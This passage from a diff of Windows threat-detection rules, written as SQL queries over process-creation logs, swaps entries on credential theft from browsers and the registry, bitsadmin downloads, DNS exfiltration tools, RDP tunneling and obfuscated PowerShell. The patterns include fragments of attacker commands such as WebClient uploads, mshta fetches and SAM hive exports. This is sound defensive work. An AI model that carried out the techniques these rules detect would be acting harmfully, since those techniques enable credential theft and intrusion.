WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR 
CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level", - "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator script" + "System administrator usage", + "Anti 
virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Suspicious 
ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": 
"ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Detects 
the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "status": "experimental", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly 
save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": 
"Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' 
ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], 
"falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1218" - ], + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Legitimate admin scripts" + "Legitimate administrative scripts may use this functionality. 
Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", - "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", + "status": "experimental", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use when 
App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { "title": "Use Short Name Path in Image", 
@@ -12342,1263 +12237,1205 @@ "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", - "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE 
'\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' 